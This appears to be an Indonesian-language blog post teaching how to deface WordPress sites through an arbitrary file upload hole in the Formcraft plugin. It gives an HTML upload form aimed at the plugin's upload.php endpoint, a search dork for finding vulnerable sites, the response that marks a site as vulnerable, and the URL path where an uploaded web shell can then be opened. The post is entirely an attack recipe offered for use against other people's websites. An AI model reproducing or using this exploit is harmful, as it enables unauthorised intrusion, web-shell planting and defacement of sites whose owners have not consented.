Kali ini gua mau share Cara Defece Menggunakan Wordpress Formcraft Exploit
Langsung saja
Bahan-bahan
-Shel
-CSRF
(simpan dengan ext.html)<form method = "POST" action = "http://
Target/wp-content/plugins/
formcraft/file-upload/server/php/
upload.php"enctype = "multipart / form-data">
<input type = "file" name = "files []" /> <button> Upload </ button>
</ form>
Dork : inurl:/wp-content/plugins/formcraft < kembangin
Exploit : /wp-content/plugins/formcraft/file- upload/server/php/upload.php
kalau sudah di exploit keluar kaya gini "failed": "No files found" atau files [] , itu tandanya target Vuln
kalau sudah keluar kaya gitu , masukan Target ke CSRF tdi , lalu upload shelmu
kalau berhasil nanti akan keluar Angka Random .
Contoh : 9860ab123abcd--blabla.php
untuk Akses Shel : http:// www.site.com/wp-content/plugins/ formcraft/fileupload/server/php/files/nameshellrandom.php
@Kalau masih tidak mengerti , harap berkomentar
0 Response to "Defece Wordpress Formcraft Exploit"
Post a Comment